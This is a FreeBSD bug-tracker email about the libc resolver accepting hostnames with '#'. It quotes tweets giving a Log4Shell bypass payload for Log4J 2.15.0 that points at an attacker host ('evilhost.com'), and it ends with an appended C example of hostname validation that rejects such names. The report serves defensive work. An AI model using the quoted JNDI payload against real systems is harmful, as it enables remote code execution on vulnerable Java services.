Date:      Wed, 29 Dec 2021 01:24:29 +0000
From:      bugzilla-noreply@freebsd.org
To:        bugs@FreeBSD.org
Subject:   [Bug 260770] libc resolver does not validate domain names
Message-ID:  <bug-260770-227-gYdtnf5L4t@https.bugs.freebsd.org/bugzilla/>
In-Reply-To: <bug-260770-227@https.bugs.freebsd.org/bugzilla/>
References:  <bug-260770-227@https.bugs.freebsd.org/bugzilla/>

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=260770

--- Comment #1 from Ed Maste <emaste@freebsd.org> ---
Ref:

https://twitter.com/marcioalm/status/1471740771581652995
> FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks
> in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
> and to bypass allowedClasses just choose a name for a class in the JDK.
> Deserialization will occur as usual. #Log4Shell 1/n

https://twitter.com/Shaquil86300527/status/1472153790463815680
> In my tests, this doesn't work on Windows and Linux. It does work in MacOS and
> FreeBSD.
> # is not valid for DNS but *some* resolvers might query names with # in it.
> TBC for this to work the vulnerable application must run on freeBSD or MacOS
> and actor must control a DNS domain.

-- 
You are receiving this mail because:
You are the assignee for the bug.
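Added example (not FreeBSD libc code, not Log4j or JDK code): the check the bug title says the resolver lacks, an RFC 1123 "LDH" hostname validator that rejects a name like 127.0.0.1#evilhost.com before any DNS query goes out. To show why such a name can reach the resolver at all, the block also includes two host extractions for a URI: one per RFC 3986 (authority ends at '#', so the host is 127.0.0.1) and one that this example assumes, taking the text up to the port separator without stopping at '#'. That pair is this example's model of the mismatch between an allow-list check and the resolver, and is not a description of the Log4j or JNDI code; all input strings are constructed.

```c
/* Hostname validation of the kind a resolver can apply before sending a
 * query, plus two ways of pulling a host out of a URI. Added example;
 * the URI functions are this example's own model, not any library's. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_LABEL 63
#define MAX_NAME  253

/* Letters, digits and hyphen only: the LDH rule of RFC 952 / RFC 1123.
 * Checked explicitly so locale settings cannot widen the set. */
static bool is_ldh(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '-';
}

/* Return true if name is a syntactically valid hostname: labels of 1..63
 * LDH characters, no leading or trailing hyphen, separated by '.', one
 * optional trailing dot, at most 253 characters in total. Anything else
 * ('#', '/', ' ', '@', non-ASCII) is rejected, so a resolver applying
 * this check refuses the query instead of asking DNS for the odd name. */
bool hostname_is_valid(const char *name)
{
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '.')   /* allow one trailing dot */
        len--;
    if (len == 0 || len > MAX_NAME)
        return false;

    size_t label_len = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            /* empty label ("a..b") or label ending in '-' */
            if (label_len == 0 || name[i - 1] == '-')
                return false;
            label_len = 0;
            continue;
        }
        if (!is_ldh(c))
            return false;
        if (label_len == 0 && c == '-')    /* label starting with '-' */
            return false;
        if (++label_len > MAX_LABEL)
            return false;
    }
    /* the final label must be non-empty and not end in '-' */
    return label_len > 0 && name[len - 1] != '-';
}

/* RFC 3986 host of "scheme://host[:port][/path][?query][#fragment]":
 * the authority ends at the first '/', '?' or '#', and the port is the
 * text after the ':' inside it. Bracketed IPv6 literals are not handled
 * here (assumption of this example). Returns false if there is no "//"
 * or out is too small. */
bool uri_rfc3986_host(const char *uri, char *out, size_t outsz)
{
    const char *p = strstr(uri, "//");
    if (p == NULL)
        return false;
    p += 2;
    size_t n = strcspn(p, "/?#");           /* end of authority */
    const char *colon = memchr(p, ':', n);
    if (colon != NULL)
        n = (size_t)(colon - p);            /* drop ":port" */
    if (n + 1 > outsz)
        return false;
    memcpy(out, p, n);
    out[n] = '\0';
    return true;
}

/* Looser extraction assumed for this example: everything after "//" up
 * to the ':' before the port or the next '/', without stopping at '#'.
 * This is the string that would reach the resolver in the model above. */
bool naive_host_before_port(const char *uri, char *out, size_t outsz)
{
    const char *p = strstr(uri, "//");
    if (p == NULL)
        return false;
    p += 2;
    size_t n = strcspn(p, ":/");
    if (n + 1 > outsz)
        return false;
    memcpy(out, p, n);
    out[n] = '\0';
    return true;
}

int main(void)
{
    /* Constructed inputs: a URI shaped like the quoted PoC and an ordinary one. */
    const char *uris[] = {
        "ldap://127.0.0.1#evilhost.com:1389/a",
        "ldap://ldap.example.net:389/dc=example",
    };
    for (size_t i = 0; i < sizeof uris / sizeof uris[0]; i++) {
        char checked[256], queried[256];
        if (!uri_rfc3986_host(uris[i], checked, sizeof checked) ||
            !naive_host_before_port(uris[i], queried, sizeof queried))
            continue;
        printf("%s\n  allow-list check sees host: %s\n  resolver is handed:         %s -> %s\n",
               uris[i], checked, queried,
               hostname_is_valid(queried) ? "valid, query would be sent"
                                          : "rejected before any DNS query");
    }
    return 0;
}
```

With the validator in place, the first URI's allow-list check still sees 127.0.0.1, but the name handed to the resolver, 127.0.0.1#evilhost.com, is refused rather than sent to an attacker-controlled DNS domain; a resolver that lacks the check is the one the second quoted tweet describes.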



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-260770-227-gYdtnf5L4t>